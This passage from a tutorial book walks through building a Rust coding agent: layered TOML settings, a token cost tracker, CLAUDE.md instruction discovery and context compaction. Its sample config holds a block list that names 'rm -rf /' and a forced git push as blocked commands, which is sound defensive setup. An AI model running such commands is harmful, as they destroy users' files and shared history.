Notice the double-parse for MINI_CLAW_MAX_TOKENS: first std::env::var to get the string, then .parse::<u64>() to convert it to a number. If the string is not a valid integer, the parse silently fails and the existing value is kept. No panic, no error message. This is the right behavior for environment variables -- a typo in MINI_CLAW_MAX_TOKENS=abc should not crash the agent.


CostTracker: knowing what you spend

Every LLM API call costs money. The cost depends on two factors: how many tokens you send (input) and how many tokens the model generates (output). Different models have wildly different pricing -- Claude Sonnet is roughly $3 per million input tokens and $15 per million output tokens, while Haiku is an order of magnitude cheaper.

A coding agent makes many API calls per session. A complex task might run 20-30 tool-use turns, each sending the full conversation history. Without tracking, you have no idea whether a session cost $0.02 or $2.00. The CostTracker accumulates token counts across a session and computes the running cost.

#![allow(unused)]
fn main() {
pub struct CostTracker {
    input_tokens: u64,
    output_tokens: u64,
    turn_count: u64,
    input_price_per_million: f64,
    output_price_per_million: f64,
}
}

Five fields. The first three are accumulators that grow with each API call. The last two are constants set at construction time based on the model's pricing.

Construction

#![allow(unused)]
fn main() {
impl CostTracker {
    pub fn new(input_price_per_million: f64, output_price_per_million: f64) -> Self {
        Self {
            input_tokens: 0,
            output_tokens: 0,
            turn_count: 0,
            input_price_per_million,
            output_price_per_million,
        }
    }
}
}

The caller provides pricing. For Claude Sonnet: CostTracker::new(3.0, 15.0). For Haiku: CostTracker::new(0.25, 1.25). This separates the tracker from model-specific knowledge -- it just counts tokens and multiplies by rates.

Recording usage

#![allow(unused)]
fn main() {
pub fn record(&mut self, usage: &crate::types::TokenUsage) {
    self.input_tokens += usage.input_tokens;
    self.output_tokens += usage.output_tokens;
    self.turn_count += 1;
}
}

Called after each provider response. The TokenUsage struct (from Chapter 4) carries the per-request token counts. The tracker accumulates them and increments the turn counter.

Note that record takes a reference to TokenUsage, not ownership. The caller typically has the usage attached to an AssistantTurn and should not have to give it up just to record costs.

Computing cost

#![allow(unused)]
fn main() {
pub fn total_cost(&self) -> f64 {
    let input_cost = self.input_tokens as f64 * self.input_price_per_million / 1_000_000.0;
    let output_cost = self.output_tokens as f64 * self.output_price_per_million / 1_000_000.0;
    input_cost + output_cost
}
}

Straightforward arithmetic. Input tokens times input price per million, divided by a million. Same for output. Add them together. The result is in USD.

For a session with 100 input tokens at $3/M and 50 output tokens at $15/M:

input:  100 * 3.0  / 1,000,000 = 0.0003
output:  50 * 15.0 / 1,000,000 = 0.00075
total:                           0.00105

That is $0.00105 -- about a tenth of a cent. A typical interactive session costs $0.05-$0.50 depending on complexity and model choice.

Summary formatting

#![allow(unused)]
fn main() {
pub fn summary(&self) -> String {
    format!(
        "tokens: {} in + {} out | cost: ${:.4}",
        self.input_tokens,
        self.output_tokens,
        self.total_cost()
    )
}
}

Produces a string like "tokens: 5000 in + 1000 out | cost: $0.0300". Four decimal places gives sub-cent precision. A TUI would display this in the status bar -- a constant reminder of what the session is costing.

Reset

#![allow(unused)]
fn main() {
pub fn reset(&mut self) {
    self.input_tokens = 0;
    self.output_tokens = 0;
    self.turn_count = 0;
}
}

Zeroes the accumulators but keeps the pricing. Useful when starting a new logical task within the same session, or for per-conversation cost tracking in a multi-conversation agent.

Accessor methods

The tracker exposes its accumulators through read-only methods:

#![allow(unused)]
fn main() {
pub fn total_input_tokens(&self) -> u64 { self.input_tokens }
pub fn total_output_tokens(&self) -> u64 { self.output_tokens }
pub fn turn_count(&self) -> u64 { self.turn_count }
}

These let the UI and logging systems read the state without mutation. The fields themselves are private -- the only way to modify them is through record() and reset(), which keeps the accounting consistent.


Putting it together: a sample config file

Here is what a project's .claw/config.toml might look like:

model = "anthropic/claude-sonnet-4-20250514"
max_context_tokens = 100000

protected_patterns = [".env", "*.lock", "secrets/*"]
blocked_commands = ["rm -rf /", "git push --force"]

instructions = "Always run cargo fmt after editing Rust files."

And a user's ~/.config/mini-claw/config.toml:

model = "anthropic/claude-sonnet-4-20250514"
base_url = "https://my-proxy.example.com/v1"

When both exist, the loader merges them:

  1. Defaults -- all fields get their default values.
  2. Project config parses into a ConfigOverlay with Some(_) for exactly the keys the file mentions: model, max_context_tokens, protected_patterns, blocked_commands, instructions. merge applies each one to the base.
  3. User config parses into an overlay with Some(_) for model and base_url. Even though its model value happens to equal the default, that no longer matters -- the overlay says the field was set, so it replaces the project's value. base_url likewise replaces the default.
  4. Environment -- if MINI_CLAW_MODEL is set, it overrides everything.

The final config has the project's safety rules, the user's model and proxy URL, and defaults for everything else. Each layer contributes what it knows without needing to repeat what it does not care about, and a layer is never silently ignored just because the value it set coincides with the default.


How Claude Code does it

Claude Code has a similar 4-level hierarchy: project settings, user settings, environment, defaults. The details differ in instructive ways.

Format. Claude Code uses JSON (settings.json, settings.local.json) rather than TOML. JSON is more familiar to web developers (Claude Code's primary audience) and integrates naturally with TypeScript. We use TOML because it is the Rust ecosystem standard -- every Rust developer already reads Cargo.toml daily.

Merge sophistication. Claude Code supports per-key override strategies. Some fields append (permission rules accumulate across layers), some replace (model name), and some use first-wins semantics (project instructions take precedence over user instructions for the same key). Our merge logic uses a single strategy: every field the overlay set replaces the base, collections included. Simpler, but it covers the common cases.

Cost tracking. Claude Code tracks costs per model with cache-aware pricing. When the API reports cache_read_tokens, those tokens are billed at a reduced rate (typically 90% cheaper than regular input tokens). Our CostTracker ignores caching -- it treats all input tokens the same. Adding cache-aware pricing would mean extending record() to accept cache_read_tokens and applying a separate rate, but the architecture does not change.

Validation. Claude Code validates settings on load -- unknown keys produce warnings, type mismatches produce errors. Our load_file silently drops unparseable files. A production implementation would validate and report.

Despite these differences, the layered architecture is the same. Settings flow from general (defaults) to specific (environment), each layer overriding the previous. The Config struct is the single source of truth for the entire agent, passed to every subsystem that needs to know how to behave.


Tests

Run the tests:

cargo test -p mini-claw-code-starter config  # Config, ConfigLoader
cargo test -p mini-claw-code-starter cost_tracker  # CostTracker

Note: Config and ConfigLoader tests are in config (following the V1 numbering where configuration was Chapter 16). CostTracker tests are in cost_tracker (V1 token tracking chapter).

Key config tests (config):

  • test_config_default_config -- Config::default() produces the expected model, token limit, and non-empty safety defaults.
  • test_config_load_from_toml -- A TOML string with model and max_context_tokens deserializes correctly.
  • test_config_default_fills_missing_fields -- A TOML file with only model still gets defaults for preserve_recent, instructions, etc.
  • test_config_load_nonexistent_path -- Loading from a non-existent path returns None instead of panicking.
  • test_config_mcp_server_config -- MCP server configuration round-trips through TOML correctly.
  • test_config_hooks_config -- Hook configuration (command, tool_pattern, timeout) deserializes from TOML.
  • test_config_env_override -- Setting MINI_CLAW_MODEL environment variable overrides the model in the loaded config.
  • test_config_protected_patterns_default -- Default config includes .env and .git/** in protected patterns.

Key cost tracker tests (cost_tracker):

  • test_cost_tracker_empty_tracker -- A new tracker starts at zero tokens, zero turns, zero cost.
  • test_cost_tracker_record_single_turn -- Recording one turn increments input/output tokens and the turn counter.
  • test_cost_tracker_accumulates_across_turns -- Three record() calls accumulate totals correctly.
  • test_cost_tracker_cost_calculation -- 1M input + 1M output tokens at $3/$15 per million = $18.00.
  • test_cost_tracker_cost_small_numbers -- 1000 input + 200 output tokens = $0.006.
  • test_cost_tracker_summary_format -- summary() produces the expected "tokens: N in + N out | cost: $X.XXXX" format.
  • test_cost_tracker_reset -- reset() zeroes accumulators but preserves pricing.

Key takeaway

Layered configuration lets each level (defaults, project, user, environment) contribute only what it knows. Splitting the shape into a fully-resolved Config and a partial ConfigOverlay (fields are Option<T>) puts the "was this field set?" question in the type system: None means the file did not mention it, Some(v) means it did -- regardless of what v is. Merge then has a single rule: every Some(_) replaces the base.


Recap

This chapter built two subsystems that the rest of the agent depends on.

  • Config holds every configurable parameter in a single struct. Serde's #[serde(default)] attributes make partial TOML files work -- you only set what you want to change.

  • ConfigOverlay is the partial counterpart to Config: every field is Option<T>. None means the field was not set in the layer, Some(v) means it was -- and stays distinguishable from the default even when v happens to equal the default.

  • ConfigLoader implements the 4-level merge pipeline: defaults, project config, user config, environment variables. Each file layer is parsed into a ConfigOverlay and applied with a single rule: every Some(_) replaces the base.

  • CostTracker accumulates token usage across a session and computes estimated cost from per-million pricing. Its summary() method produces the one-line status string the TUI displays.

  • The merge strategy is the key design decision. Encoding "set vs unset" in the type system (instead of guessing from the value) guarantees last-write-wins and makes explicit resets -- clearing a list, re-asserting a default -- work correctly.

  • Environment variables are deliberately limited to three fields. Safety-critical settings like blocked_commands and protected_patterns should come from config files that are checked into source control or managed explicitly -- not from environment variables that might be manipulated.


What's next

Configuration tells the agent how to behave. Chapter 18 -- Project Instructions -- tells it what to know. The instructions field you saw in Config is just a string. The instruction system reads CLAUDE.md files from the project tree, merges them with user instructions, and injects them into the system prompt. Together, settings and instructions make the agent context-aware -- it adapts its behavior and knowledge to each project it works in.

Check yourself


← Chapter 16: Plan Mode · Contents · Chapter 18: Project Instructions →

Chapter 18: Project Instructions & Context Management

File(s) to edit: src/context.rs Tests to run: cargo test -p mini-claw-code-starter instructions (InstructionLoader), cargo test -p mini-claw-code-starter context_manager (ContextManager) Estimated time: 40 min

This chapter closes the loop on two pieces that keep an agent running over a long session:

  • InstructionLoader (built in Chapter 8) discovers CLAUDE.md files by walking up the filesystem. We revisit it here to see how its output gets injected into the conversation at session start.
  • ContextManager (new in this chapter) keeps the conversation inside the model's context window by summarising old turns once the token budget is exceeded. This is the piece you fill in.

In Chapter 17 you added Config, a layered settings hierarchy. One of its fields is instructions: Option<String> -- custom text the user can put in a TOML config file and have injected into the system prompt.

This chapter wires all three together. It is the chapter where your agent becomes project-aware (launching from /home/user/project/backend picks up different CLAUDE.md files than /home/user/other) and session-durable (a 20-turn debugging session does not hit the context wall).

cargo test -p mini-claw-code-starter instructions  # InstructionLoader
cargo test -p mini-claw-code-starter context_manager  # ContextManager

Goal

  • Understand how InstructionLoader output and Config.instructions get injected as system messages at session start.
  • Implement ContextManager::record so token usage from each turn accumulates into a running total.
  • Implement ContextManager::compact so that once the budget is exceeded, the middle of the message history is replaced by an LLM-generated summary while the system prompt and the most recent messages are preserved intact.
  • Understand why the system prompt (which includes discovered CLAUDE.md content) must survive compaction unchanged -- it is the one message the LLM needs on every turn.

The session-level pipeline

Here is the complete flow. At session start instructions are discovered and pushed into the message history. During the session the ContextManager watches token usage and compacts the middle of that history once the budget is exceeded.

  ┌─────────────────────────────┐
  │  Filesystem                 │      (at session start)
  │                             │
  │  /home/user/CLAUDE.md       │──┐
  │  /home/user/project/        │  │
  │    CLAUDE.md                │──┤  InstructionLoader::discover()
  │    backend/                 │  │  walks upward, collects paths
  │      CLAUDE.md              │──┤
  │      .claw/instructions.md  │──┘
  └─────────────────────────────┘
              │
              ▼
  ┌─────────────────────────────┐
  │  InstructionLoader::load()  │
  │  concatenates with headers  │
  │  and --- separators         │
  └─────────────────────────────┘
              │
              ▼
  ┌─────────────────────────────┐
  │  messages[0] = System(      │      (injected once, never edited)
  │    "# Instructions from ... │
  │     <concatenated CLAUDE>"  │
  │  )                          │
  └─────────────────────────────┘
              │
              ▼  (agent loop: User → Assistant → ToolResult → ...)
              │
  ┌─────────────────────────────┐
  │  ContextManager             │      (runs after every turn)
  │                             │
  │  .record(usage)             │  ← accumulate input + output tokens
  │  .should_compact()          │  ← tokens_used >= max_tokens?
  │                             │
  │  On trigger:                │
  │    keep  messages[0]        │  ← the system/instructions message
  │    ask   provider to        │
  │          summarise middle   │  ← LLM call with the old transcript
  │    keep  last N messages    │
  │                             │
  │  Result: short history,     │
  │  same system prompt.        │
  └─────────────────────────────┘

Two points to notice.

Instructions are stable within a session. They are loaded once, become the first system message, and are never rewritten. Launch from a different directory and you get a different messages[0], but once a session has started the instruction content is fixed. Users generally do not edit CLAUDE.md mid-chat.

Context management is session-level, not prompt-level. Compaction does not splice new sections into a "system prompt"; it rewrites the message history by summarising the middle. The system prompt (which carries your instructions) is deliberately excluded from compaction -- it is always the anchor.


Revisiting InstructionLoader

You built this in Chapter 8. Let's revisit the code now that we are using it in a real pipeline, because the design decisions matter more in context.

The struct

#![allow(unused)]
fn main() {
pub struct InstructionLoader {
    file_names: Vec<String>,
}
}

The loader does not hardcode which files to look for. It takes a list of file names, and default_files() sets that list to ["CLAUDE.md", ".claw/instructions.md"]. This means you can swap in different file names for testing, or add project-specific alternatives without modifying the loader.

#![allow(unused)]
fn main() {
impl InstructionLoader {
    pub fn new(file_names: &[&str]) -> Self {
        Self {
            file_names: file_names.iter().map(|s| s.to_string()).collect(),
        }
    }

    pub fn default_files() -> Self {
        Self::new(&["CLAUDE.md", ".claw/instructions.md"])
    }
}
}

Discovery: the upward walk

flowchart BT
    A["/home/user/project/backend/"] -->|check for CLAUDE.md| B["/home/user/project/"]
    B -->|check for CLAUDE.md| C["/home/user/"]
    C -->|check for CLAUDE.md| D["/home/"]
    D -->|check for CLAUDE.md| E["/"]

    A -.->|"found: backend/CLAUDE.md"| F["Collected paths<br/>(reversed to root-first)"]
    B -.->|"found: project/CLAUDE.md"| F
    C -.->|"found: user/CLAUDE.md"| F

discover() starts at the given directory and walks toward the filesystem root. At each directory, it checks for every file name in the list:

#![allow(unused)]
fn main() {
pub fn discover(&self, start_dir: &Path) -> Vec<PathBuf> {
    let mut found = Vec::new();
    let mut dir = Some(start_dir.to_path_buf());

    while let Some(current) = dir {
        for name in &self.file_names {
            let candidate = current.join(name);
            if candidate.is_file() {
                found.push(candidate);
            }
        }
        dir = current.parent().map(|p| p.to_path_buf());
    }

    found.reverse(); // Root-first order
    found
}
}

The found.reverse() at the end is the key design choice. The walk naturally collects files from most-specific to most-general (start directory first, root last). Reversing puts them in root-first order.

After discover("/home/user/project/backend") with CLAUDE.md files at three levels, the vector is:

[0] /home/user/CLAUDE.md               ← global preferences
[1] /home/user/project/CLAUDE.md       ← project conventions
[2] /home/user/project/backend/CLAUDE.md ← subdirectory rules

Global preferences come first. The most specific rules come last. When the LLM reads the system prompt, the last instructions have the strongest influence -- the same principle as CSS specificity: general rules first, overrides last.

Loading: read, filter, join

load() calls discover(), reads each file, and concatenates the results:

#![allow(unused)]
fn main() {
pub fn load(&self, start_dir: &Path) -> Option<String> {
    let paths = self.discover(start_dir);
    if paths.is_empty() {
        return None;
    }

    let mut sections = Vec::new();
    for path in &paths {
        if let Ok(content) = std::fs::read_to_string(path) {
            let content = content.trim().to_string();
            if !content.is_empty() {
                sections.push(format!(
                    "# Instructions from {}\n\n{}",
                    path.display(),
                    content
                ));
            }
        }
    }

    if sections.is_empty() {
        None
    } else {
        Some(sections.join("\n\n---\n\n"))
    }
}
}

Three details:

Headers. Each file's content is prefixed with # Instructions from <path>. This tells the LLM where each block came from, helping it resolve contradictions between levels.

Separators. Files are joined with \n\n---\n\n -- a horizontal rule in markdown that gives the LLM a clear boundary between instruction blocks.

Empty file skipping. If a CLAUDE.md exists but is empty or whitespace-only, it is silently skipped. No point wasting context tokens on an empty section.

Returning None. If no instruction files are found, or all are empty, load() returns None rather than Some(""). This lets the caller skip adding an instructions section entirely.


The instruction hierarchy

Instructions can come from multiple sources. Here is the full hierarchy, from broadest to most specific:

Source                              Priority    Section type
──────────────────────────────────────────────────────────────
/home/user/CLAUDE.md                lowest      file (root-first)
/home/user/project/CLAUDE.md        ↓           file
/home/user/project/backend/CLAUDE.md ↓          file
.claw/instructions.md               ↓           file (alternative)
Config.instructions                 highest     config

File-based instructions are discovered by the InstructionLoader and appear in root-first order. Config-based instructions come from the Config struct's instructions field -- loaded from .claw/config.toml or ~/.config/mini-claw/config.toml.

Both become dynamic sections in the system prompt. File instructions are added first, config instructions second. Since the LLM reads the prompt top-to-bottom, config instructions have the final word when there is a conflict.

Why two sources?

CLAUDE.md files are committed to version control. They represent team conventions that everyone on the project shares. "Run tests with cargo test." "Never modify generated files." "Use edition 2024."

Config instructions are local. They live in .claw/config.toml (which may or may not be committed) or in the user's home config directory (which is never committed). They represent personal preferences or temporary overrides. "Always explain your reasoning." "Focus on performance over readability for this session."


Key Rust concept: Option chaining with if let for optional pipeline steps

The wiring code uses if let Some(instructions) = loader.load(...) to conditionally add sections. This pattern is idiomatic Rust for optional pipeline steps: InstructionLoader::load() returns Option<String> -- None when no instruction files exist, Some(text) when they do. The if let binding destructures the Option and only executes the body when there is a value. Similarly, Config.instructions is Option<String>, and if let Some(ref inst) = config.instructions only adds the section when the config has instructions. This means the prompt builder never adds empty sections -- the system prompt is exactly as long as it needs to be.


Wiring it together

Session startup is where InstructionLoader meets Config.instructions. Both end up as system messages at the head of the conversation. In code:

#![allow(unused)]
fn main() {
let loader = InstructionLoader::default_files();
let mut messages: Vec<Message> = Vec::new();

// File-based instructions (CLAUDE.md, root-first).
if let Some(instructions) = loader.load(Path::new(cwd)) {
    messages.push(Message::System(instructions));
}

// Config-based instructions get the last word.
if let Some(ref inst) = config.instructions {
    messages.push(Message::System(inst.clone()));
}
}

Message::System is the variant we have been using throughout the book for the agent's instructions. Both sources become system messages at the head of the history, in priority order: global → project → subdirectory → config. The LLM reads them top-down, so later messages override earlier ones when they disagree.

For this book we do not maintain a separate structured "prompt builder" that tracks identity / safety / environment / instructions as named sections. A production agent like Claude Code does: see the sidebar below for the shape of that design. What matters for the rest of this chapter is that the instructions are now sitting at the start of messages, and that the agent loop never touches them again.

Claude Code and similar agents separate the system prompt into named sections -- identity, safety, tool schemas, environment, instructions -- and split the list across a cache boundary. Everything above the boundary is stable across turns and can be marked cacheable by the provider; everything below can change and is re-sent each turn.

Schematically (this is not in the starter):

# identity, safety, tool schemas       ← cached prefix, stable across turns
# ──── cache boundary ─────────
# environment, instructions            ← dynamic suffix, may change

This design wins real cost and latency: long stable prefixes are processed once and reused. The starter does not model it explicitly because our Message::System messages already live in a single list; provider-side caching (when implemented) can key off the prefix of that list.

For the rest of the chapter we focus on what the starter does model: keeping the conversation short enough to fit in the context window as the session runs long. That job belongs to ContextManager.


ContextManager: the compaction algorithm

The starter's ContextManager lives in src/context.rs. It has three responsibilities:

  1. Track token usage (record): add the input + output tokens from each provider turn to a running counter.
  2. Decide when to act (should_compact): return true once the counter hits the configured budget.
  3. Rewrite history when asked (compact): collapse old messages into a single LLM-generated summary while preserving the anchors.

The struct

#![allow(unused)]
fn main() {
pub struct ContextManager {
    max_tokens: u64,
    preserve_recent: usize,
    tokens_used: u64,
}
}

Two knobs, one piece of state.

  • max_tokens — the soft limit. When tokens_used reaches it, compaction triggers. Set this comfortably below the model's hard context limit so there is room for the next turn to complete before you shrink.
  • preserve_recent — how many trailing messages survive compaction untouched. These carry the immediate conversational context -- the last user turn, the tool call you just made, the tool result you are about to reason about. Summarising them would break the next turn.
  • tokens_used — the running total, updated by record after every provider call.

Recording and triggering

record is tiny -- it just accumulates:

#![allow(unused)]
fn main() {
pub fn record(&mut self, usage: &TokenUsage) {
    self.tokens_used += usage.input_tokens + usage.output_tokens;
}
}

And should_compact compares against the budget:

#![allow(unused)]
fn main() {
pub fn should_compact(&self) -> bool {
    self.tokens_used >= self.max_tokens
}
}

The agent loop calls record after each provider turn and then maybe_compact, which only invokes compact when the threshold is reached. In practice this means compaction is rare: most turns are under budget and do nothing.

Compaction: head + summary + tail

compact splits the message history into three slices:

messages = [ head        | middle        | recent          ]
           <-- keep ---->|<-- summarise->|<-- keep intact ->
  • head — the leading Message::System (if present). This is where the CLAUDE.md-derived instructions live. Always preserved.
  • middle — everything between head and the last preserve_recent messages. This is what gets summarised.
  • recent — the last preserve_recent messages. Always preserved.

The middle is rendered as a compact transcript ("User: ...", "Assistant: ...", " [tool: name]", " Tool result: <preview>"), sent to the provider with a short instruction ("Summarise in 2-3 sentences, preserving key facts and decisions"), and the result becomes a single synthetic system message: Message::System("[Conversation summary]: ...").

The reconstructed vector is [head, summary, ...recent]. A 40-message conversation collapses to roughly 1 + 1 + preserve_recent messages.

The /= 3 token reset

After compaction we cannot know exactly how many tokens the new history uses without re-tokenising. But we know the new history is much shorter than the old one, so continuing to accumulate against the pre-compaction total would trigger another compaction immediately. A rough proxy:

#![allow(unused)]
fn main() {
self.tokens_used /= 3;
}

Empirically, compacting a long history down to [system, summary, N recent] reduces token count by roughly 3–5×. Dividing by 3 is a conservative estimate that keeps the agent running until the real token count climbs back to the budget. A more precise implementation would re-count tokens from the new messages vector; the proxy is good enough for the starter and keeps the code simple.

Why summarise instead of truncate?

The obvious alternative is to drop old messages outright. That is cheap (no extra LLM call) but loses information. If the user said "use snake_case throughout" on turn 3 and you drop it on turn 40, the agent forgets. A summary preserves the decisions and facts from the dropped range at the cost of one extra LLM roundtrip per compaction. Since compactions are rare, the tradeoff favours the summary.

Why a system message for the summary rather than a user or assistant one? Because the summary is meta-context, not something either speaker said. System framing tells the LLM "this is background, not an active speaking turn", which matches how it is meant to be used.


How Claude Code does it

Claude Code discovers CLAUDE.md files by walking up from the working directory, following the same upward-walk pattern we implemented. But its instruction system is more elaborate in several ways.

User-level instructions. Claude Code supports ~/.claude/CLAUDE.md as a global instruction file. Our InstructionLoader achieves the same effect naturally: if the upward walk reaches the home directory and finds a CLAUDE.md, it gets included. No special case needed.

Settings-based tool rules. Claude Code's .claude/settings.json specifies per-tool permission rules. These configure the permission engine (Chapter 13), not the prompt. Our Config keeps it simpler with allowed_directory, protected_patterns, and blocked_commands.

Memory files. Claude Code supports persistent memory that accumulates facts across sessions. Memory is loaded alongside instructions but managed separately. Our book stops before memory, but the instruction loader is the natural hook point for extending into it.

Instruction validation. Claude Code warns when instructions at different levels contradict each other. Our implementation trusts the LLM to resolve contradictions using the root-first ordering -- the more specific instruction wins because it appears later.

The core pattern is identical: discover files, load them in order, inject as dynamic prompt sections. Everything else is refinement.


Tests

Run the tests:

cargo test -p mini-claw-code-starter instructions  # InstructionLoader
cargo test -p mini-claw-code-starter context_manager  # ContextManager

Note: InstructionLoader tests live in instructions (built in Chapter 8 and revisited here). ContextManager tests live in context_manager (added in this chapter).

Key InstructionLoader tests (instructions):

  • test_instructions_discover_in_current_dir -- Finds a CLAUDE.md in the start directory.
  • test_instructions_discover_in_parent -- Walks upward and finds a CLAUDE.md in the parent directory.
  • test_instructions_no_files_found -- Returns an empty list when no instruction files exist anywhere in the path.
  • test_instructions_load_content -- load() returns Some with the file content included.
  • test_instructions_load_empty_file -- load() returns None for an empty CLAUDE.md (no wasted tokens).
  • test_instructions_multiple_file_names -- Discovers both CLAUDE.md and .mini-claw/instructions.md in the same directory.
  • test_instructions_system_prompt_section -- system_prompt_section() wraps content with a "project instructions" header.
  • test_instructions_default_files -- default_files() constructor does not panic.

Key context tests (context_manager):

  • test_context_manager_below_threshold_no_compact -- Context manager does not trigger compaction when below the token threshold.
  • test_context_manager_triggers_at_threshold -- Compaction triggers when recorded tokens exceed the threshold.
  • test_context_manager_compact_preserves_system_prompt -- After compaction, the system prompt remains as the first message.
  • test_context_manager_compact_preserves_recent -- The most recent N messages survive compaction intact.

Key takeaway

Instructions are injected once at session start and compaction runs on demand mid-session. The system message at messages[0] is the anchor: it carries the instructions that differentiate this project from any other, and it survives every compaction unchanged so the agent never loses its grounding.


Recap

This chapter connected three pieces:

  • InstructionLoader discovers CLAUDE.md files by walking up the filesystem and concatenates them root-first with headers and separators. Global preferences come first, subdirectory overrides come last.

  • Config.instructions supplies an optional second block of instructions from the layered config built in Chapter 17. It gets appended after the file-based block, so it has the final word.

  • ContextManager tracks token usage and compacts the middle of the message history into an LLM-generated summary when the budget is exceeded. It preserves the leading system message (your instructions) and the trailing preserve_recent messages (your current conversational context).

The startup pipeline is: discover instruction files, build a Message::System with their concatenated content, optionally append another Message::System from Config.instructions, then run the normal agent loop. After every provider turn the loop calls record and maybe_compact; in a short session compaction never fires, in a long one it fires as many times as needed.


Where to go from here

This is the last chapter in the current series. The foundations are now in place: messages, provider, tools, agent loop, prompt, permissions, safety, hooks, plan mode, settings, and instructions.

Natural extensions to explore on your own:

  • Persistent memory -- facts the agent learns in one session and recalls in the next. Memory files load alongside instructions, but they are managed differently: instructions are authored by humans, memory is authored by the agent itself.
  • Token and cost tracking -- instrumenting the provider to aggregate per-session token usage and surface it in the TUI.
  • Smarter compaction -- our ContextManager uses a single summary pass and a rough /= 3 token reset. Production-grade alternatives include hierarchical summaries (summary of summaries) and re-tokenising the new history for an exact count.
  • Sessions and resume -- serializing the message history to disk so a conversation can be paused and resumed.
  • MCP (Model Context Protocol) -- loading tools from external MCP servers at runtime instead of hardcoding them at startup.
  • Subagents -- spawning child agents with a filtered tool set for scoped subtasks.

Check yourself


← Chapter 17: Settings Hierarchy · Contents